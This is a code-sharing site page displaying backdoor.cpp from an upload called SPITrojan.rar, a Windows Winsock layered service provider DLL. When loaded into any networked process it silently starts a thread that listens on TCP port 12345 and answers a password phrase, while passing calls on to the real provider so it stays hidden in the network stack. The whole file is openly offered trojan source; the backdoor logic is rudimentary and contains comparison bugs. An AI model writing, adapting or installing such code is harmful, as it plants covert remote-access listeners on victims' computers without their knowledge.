开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 防火墙与安全工具 > 查看源码
backdoor.cpp
资源名称:SPITrojan.rar [点击查看]
上传用户:whhgrj
上传日期:2022-05-27
资源大小:2229k
文件大小:6k
源码类别:

防火墙与安全工具

开发平台:

Visual C++

backdoor.cpp:源码内容
  1. // backdoor.cpp : Defines the entry point for the DLL application.
  2. //
  4. #include "stdafx.h"
  6. #pragma data_seg("Shared") 
  7. int     dllcount=0;
  8. #pragma data_seg()
  9. #pragma comment (linker,"/section:Shared,rws")
  11. //#define  UNICODE
  12. //#define  _UNICODE
  14. #include <ws2spi.h>
  15. #include <tchar.h>
  16. #include <winsock2.h>  
  18. GUID  filterguid={0xc5fabbd0,0x9736,0x11d1,{0x93,0x7f,0x00,0xc0,0x4f,0xad,0x86,0x0d}};
  20. LPWSAPROTOCOL_INFOW  protoinfo=NULL;
  21. WSPPROC_TABLE        nextproctable;
  22. DWORD                protoinfosize=0;
  23. HANDLE               hmutex;  
  24. HANDLE               hthread; 
  25. POINT                nowpt;
  26. int                  totalprotos=0;
  28. DWORD WINAPI backdoor(LPVOID)   
  29. {
  30. SOCKET   sock,sockt;
  31. WSADATA  wsa;
  32. int      iret=0;
  33. char     msg[25];
  34. struct   sockaddr_in sin;
  36. ::MessageBox(NULL,"backdoor安装成功!","",MB_OK);
  38. if(WSAStartup(MAKEWORD(2,2),&wsa))
  39. {
  40. OutputDebugString(_T("WSAStartup Error!"));
  41. return 0;
  42. }
  44. if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
  45. {
  46. OutputDebugString(_T("Socket Error!"));
  47. return 0;
  48. }
  50. sin.sin_addr.s_addr=htons(INADDR_ANY);
  51. sin.sin_family=AF_INET;
  52. sin.sin_port=htons(12345);
  54. if(bind(sock,(struct sockaddr *)&sin,sizeof(sin))==SOCKET_ERROR)
  55. {
  56. OutputDebugString(_T("Bind Error!"));
  57. return 0;
  58. }
  60. if(listen(sock,5)==SOCKET_ERROR)
  61. {
  62. OutputDebugString(_T("Listen Error!"));
  63. return 0;
  64. }
  66.     while(1)
  67. {
  68. if((sockt=accept(sock,NULL,NULL))==SOCKET_ERROR)
  69. {
  70.      OutputDebugString(_T("Accept Error!"));
  71.      continue;
  72. }
  75. if((iret==recv(sockt,msg,sizeof(msg),0))==SOCKET_ERROR)
  76. {
  77. OutputDebugString(_T("Recv Error!"));
  78. closesocket(sockt);
  79. continue;  
  80. }
  82. if(strstr(msg,"i am TOo2y"))
  83. {
  84. memset(msg,0,sizeof(msg));
  85. memcpy(msg,"i am waiting for you !",sizeof(msg)-1);
  87. if((iret==send(sockt,msg,sizeof(msg),0))==SOCKET_ERROR)
  88. {
  89. OutputDebugString(_T("Send Error!"));
  90. closesocket(sockt);
  91. continue;
  92. }
  93. }
  94. OutputDebugString(_T("Transport Successfully"));
  95. closesocket(sockt);
  96. }
  97. return 1;
  98. }
  100. BOOL getfilter()
  101. {
  102. int    errorcode;
  104. protoinfo=NULL;
  105. protoinfosize=0;
  106. totalprotos=0;
  108. if(WSCEnumProtocols(NULL,protoinfo,&protoinfosize,&errorcode)==SOCKET_ERROR)
  109. {
  110. if(errorcode!=WSAENOBUFS)
  111. {
  112. OutputDebugString(_T("First WSCEnumProtocols Error!")); 
  113.      return FALSE;
  114. }
  115. }
  117. if((protoinfo=(LPWSAPROTOCOL_INFOW)GlobalAlloc(GPTR,protoinfosize))==NULL)
  118. {
  119. OutputDebugString(_T("GlobalAlloc Error!"));   
  120. return FALSE;
  121. }
  123. if((totalprotos=WSCEnumProtocols(NULL,protoinfo,&protoinfosize,&errorcode))==SOCKET_ERROR)
  124. {
  125. OutputDebugString(_T("Second WSCEnumProtocols Error!"));  
  126. return FALSE;
  127. }
  129. return TRUE;
  130. }
  132. void freefilter()
  133. {
  134. GlobalFree(protoinfo);
  135. }
  137. BOOL WINAPI DllMain(HINSTANCE hmodule,
  138. DWORD     reason,
  139. LPVOID    lpreserved)
  140. {
  141. TCHAR   processname[MAX_PATH];
  142. TCHAR   showmessage[MAX_PATH+25];
  145. switch(reason)
  146. {
  147. case DLL_PROCESS_ATTACH:
  148. {
  149.          GetModuleFileName(NULL,processname,MAX_PATH);
  150.        _tcscpy(showmessage,processname);
  151.          _tcscat(showmessage,_T(" Loading my dll ..."));
  152.            OutputDebugString(showmessage);  
  154. hmutex=CreateMutex(NULL,FALSE,NULL);    //  ? 
  155. WaitForSingleObject(hmutex,INFINITE); 
  156. dllcount++;
  157. if(dllcount==1)
  158. {
  159. OutputDebugString(_T("Start the backdoor ...")); 
  160. hthread=CreateThread(NULL,0,backdoor,NULL,0,NULL);  
  161. }
  162. ReleaseMutex(hmutex);
  163. break;
  164. }
  165. case DLL_PROCESS_DETACH:
  166. {
  167. WaitForSingleObject(hmutex,INFINITE);
  168. dllcount--;
  169. if(dllcount==0)
  170. {
  171. CloseHandle(hthread);
  172. }
  173. ReleaseMutex(hmutex);
  174. CloseHandle(hthread);
  175. break;
  176. }
  177. }
  178. return TRUE;
  179. }
  182. int WSPAPI WSPStartup(
  183. WORD wversionrequested,
  184. LPWSPDATA lpwspdata,
  185. LPWSAPROTOCOL_INFOW lpprotoinfo,
  186. WSPUPCALLTABLE upcalltable,
  187. LPWSPPROC_TABLE lpproctable)
  188. {
  189. int           i;
  190. int           errorcode;
  191.     int           filterpathlen;
  192. DWORD         layerid=0;
  193.     DWORD         nextlayerid=0;
  194.     TCHAR         *filterpath;
  195. HINSTANCE     hfilter;
  196. LPWSPSTARTUP  wspstartupfunc=NULL;
  198. if(lpprotoinfo->ProtocolChain.ChainLen<=1)
  199. {
  200.      OutputDebugString(_T("ChainLen<=1"));    
  201. return FALSE;
  202. }
  204. getfilter();
  206. for(i=0;i<totalprotos;i++)
  207. {
  208. if(memcmp(&protoinfo[i].ProviderId,&filterguid,sizeof(GUID))==0)
  209. {
  210. layerid=protoinfo[i].dwCatalogEntryId;
  211. break;
  212. }
  213. }
  215. for(i=0;i<lpprotoinfo->ProtocolChain.ChainLen;i++)
  216. {
  217. if(lpprotoinfo->ProtocolChain.ChainEntries[i]==layerid)
  218. {
  219. nextlayerid=lpprotoinfo->ProtocolChain.ChainEntries[i+1];
  220. break;
  221. }
  222. }
  224. // if nextlayerid == 0  ?
  226. filterpathlen=MAX_PATH;
  227. filterpath=(TCHAR*)GlobalAlloc(GPTR,filterpathlen);  
  228. for(i=0;i<totalprotos;i++)
  229. {
  230. if(nextlayerid==protoinfo[i].dwCatalogEntryId)
  231. {
  232. if(WSCGetProviderPath(&protoinfo[i].ProviderId,(wchar_t *)filterpath,&filterpathlen,&errorcode)==SOCKET_ERROR)
  233. {
  234.              OutputDebugString(_T("WSCGetProviderPath Error!")); 
  235. return WSAEPROVIDERFAILEDINIT;
  236. }
  237. break;
  238. }
  239. }
  241. if(!ExpandEnvironmentStrings(filterpath,filterpath,MAX_PATH))
  242. {
  243.       OutputDebugString(_T("ExpandEnvironmentStrings Error!"));  
  244. return WSAEPROVIDERFAILEDINIT;
  245. }
  247. if((hfilter=LoadLibrary(filterpath))==NULL)
  248. {
  249.      OutputDebugString(_T("LoadLibrary Error!"));
  250. return WSAEPROVIDERFAILEDINIT;
  251. }
  253. if((wspstartupfunc=(LPWSPSTARTUP)GetProcAddress(hfilter,"WSPStartup"))==NULL)
  254. {
  255. OutputDebugString(_T("GetProcessAddress Error!"));
  256. return WSAEPROVIDERFAILEDINIT;
  257. }
  259. if((errorcode=wspstartupfunc(wversionrequested,lpwspdata,lpprotoinfo,upcalltable,lpproctable))!=ERROR_SUCCESS)
  260. {
  261. OutputDebugString(_T("wspstartupfunc Error!")); 
  262. return errorcode;
  263. }
  265. nextproctable=*lpproctable;
  267. freefilter();
  268. return 0;
  269. }